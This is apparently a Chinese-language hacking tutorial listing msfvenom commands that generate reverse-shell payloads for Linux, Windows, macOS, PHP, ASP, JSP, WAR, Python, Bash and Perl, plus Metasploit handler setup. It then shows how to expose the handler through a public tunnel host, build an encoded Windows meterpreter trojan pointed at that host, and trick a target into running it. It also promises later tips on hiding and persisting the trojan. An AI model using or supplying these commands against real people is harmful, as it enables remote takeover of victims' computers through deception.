msfvenom生成payload命令+内网透到外网
进入msfconsole并选择exploit/multi /handler。为所使用的相关有效负载运行'set payload'并配置所有必需的选项(LHOST,LPORT等)。
执行并等待有效负载运行。对于下面的示例,它是非常自我解释但LHOST应填入您的IP地址(如果在网络内攻击,则为LAN IP,如果通过互联网进行攻击则为WAN IP),
LPORT应该是您希望重新连接的端口。
msfvenom -l
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
对于所有shellcode,请参阅'msfvenom -help-formats'以获取有效参数的信息。Msfvenom将输出能够以此语言剪切和粘贴的代码以供您利用。
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Metasploit处理程序可以很好地快速设置Metasploit以便接收您的传入shell。处理程序应采用以下格式。
use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z
完成所需的值后,以下命令将执行您的处理程序 'msfconsole -L -r'
内网透到外网+Metasploit控制客户机
首先我们需要下载一个用于内网穿透的工具来进行端口映射与转发。这里我用的是linux64bit
https://www.ngrok.cc/#down-client
,接下来在上面的网站自行注册申请,然后登陆。然后申请免费隧道,选择TCP协议,自定义远程端口,
本地IP地址就是kali的IP地址,端口自定义,但不要冲突。
这里请记住隧道id,以及自定义远程端口,kali本机端口
将下载的客户端放置于指定目录,cd到目录,在命令行运行ngrok
./sunny clientid 隧道id
这样就完成了端口映射,它能将外网端口接收到的数据返回到本机kali的指定端口。
在kali中用msfvenom生成一个payload
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=
free.idcfengye.com lport=16577 -f exe > shell.exe
将生成的木马文件以各种方式发送到目标主机,诱使其打开。
Metasploit控制客户机
切到Kali,使用Metasploit进行监听。
设置监听攻击模块,监听载荷,IP(kali本机),端口(ngrok里自定义的本地端口),然后exp。
use exploit/multi/handler set payloadswindows/meterpreter/reverset_tcp set lhost 10.10.10.129 set lport 12345 exploit
当客户机执行木马后,得到一个meterpreter,可以进行的操作。
关于隐藏木马,加陌生壳,自启动,文件包含,进程转移等各种姿势加强木马强度就需要等待更新。。。。。